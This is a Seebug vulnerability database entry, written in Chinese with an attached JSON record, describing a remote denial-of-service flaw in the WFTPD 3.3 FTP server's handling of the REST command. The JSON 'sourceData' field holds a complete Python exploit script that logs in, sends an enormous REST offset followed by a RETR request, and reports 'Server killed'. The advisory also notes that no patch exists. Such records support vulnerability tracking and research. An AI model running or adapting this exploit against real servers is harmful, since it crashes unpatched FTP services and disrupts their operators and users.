Description
BUGTRAQ ID: 38762
WFTPD是一款Windows平台下的FTP服务软件。
WFTPD服务器在处理REST命令时存在拒绝服务漏洞,远程攻击者可以通过REST命令在指定了无效的起始位置后请求文件导致FTP服务终止。
Texas Imperial Software WFTPD 3.3
厂商补丁:
Texas Imperial Software
-----------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.wftpd.com/default.html
{"href": "https://www.seebug.org/vuldb/ssvid-19288", "status": "poc,details", "bulletinFamily": "exploit", "modified": "2010-03-18T00:00:00", "title": "WFTPD REST\u547d\u4ee4\u8fdc\u7a0b\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-19288", "cvelist": [], "description": "BUGTRAQ ID: 38762\r\n\r\nWFTPD\u662f\u4e00\u6b3eWindows\u5e73\u53f0\u4e0b\u7684FTP\u670d\u52a1\u8f6f\u4ef6\u3002\r\n\r\nWFTPD\u670d\u52a1\u5668\u5728\u5904\u7406REST\u547d\u4ee4\u65f6\u5b58\u5728\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7REST\u547d\u4ee4\u5728\u6307\u5b9a\u4e86\u65e0\u6548\u7684\u8d77\u59cb\u4f4d\u7f6e\u540e\u8bf7\u6c42\u6587\u4ef6\u5bfc\u81f4FTP\u670d\u52a1\u7ec8\u6b62\u3002\n\nTexas Imperial Software WFTPD 3.3\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nTexas Imperial Software\r\n-----------------------\r\n\u76ee\u524d\u5382\u5546\u8fd8\u6ca1\u6709\u63d0\u4f9b\u8865\u4e01\u6216\u8005\u5347\u7ea7\u7a0b\u5e8f\uff0c\u6211\u4eec\u5efa\u8bae\u4f7f\u7528\u6b64\u8f6f\u4ef6\u7684\u7528\u6237\u968f\u65f6\u5173\u6ce8\u5382\u5546\u7684\u4e3b\u9875\u4ee5\u83b7\u53d6\u6700\u65b0\u7248\u672c\uff1a\r\n\r\nhttp://www.wftpd.com/default.html", "viewCount": 6, "published": "2010-03-18T00:00:00", "sourceData": "\n # WFTPD 3.3 unhandled exception\r\n#\r\n# (x)dmnt 2010\r\n# -*- coding: windows-1252 -*-\r\n\r\nimport socket\r\nimport sys, time\r\n\r\n\r\ndef help_info():\r\n print ("Usage: wftpdkill <host> <login> <password> <existingfle>\\n")\r\n\r\ndef dos_it(hostname, username, passwd, exfile):\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n try:\r\n sock.connect((hostname, 21))\r\n except:\r\n print ("[-] Connection error!")\r\n sys.exit(1)\r\n r=sock.recv(2048)\r\n print "[+] Connected"\r\n sock.send("user %s\\r\\n" %username)\r\n r=sock.recv(1024)\r\n time.sleep(3)\r\n sock.send("pass %s\\r\\n" %passwd)\r\n r=sock.recv(1024)\r\n print "Send evil commands"\r\n time.sleep(3)\r\n sock.send("pasv\\r\\n")\r\n r=sock.recv(1024)\r\n time.sleep(3)\r\n sock.send("rest 999999999999999999999999999999999999999999999999999999999999999999\\r\\n")\r\n r=sock.recv(1024)\r\n time.sleep(3)\r\n sock.send("retr %s\\r\\n" %exfile)\r\n time.sleep(3)\r\n sock.send("Burn, muthfcka, burn!\\r\\n")\r\n sock.close()\r\n print "Server killed\\r\\n"\r\n\r\nprint ("\\nWFTPD 3.3 remote DoS exploit")\r\n\r\nif len(sys.argv) < 5:\r\n help_info()\r\n sys.exit(1)\r\n\r\nelse:\r\n hostname=sys.argv[1]\r\n username=sys.argv[2]\r\n passwd=sys.argv[3]\r\n exfile=sys.argv[4]\r\n dos_it(hostname,username,passwd,exfile)\r\n sys.exit(0)\n ", "id": "SSV:19288", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T18:13:52", "reporter": "Root", "enchantments": {"score": {"value": -0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {"references": [{"type": "canvas", "idList": ["WFTPD"]}]}, "exploitation": null, "vulnersScore": -0.1}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647589307, "score": 1659709850, "epss": 1678851499}}
{}
WFTPD REST命令远程拒绝服务漏洞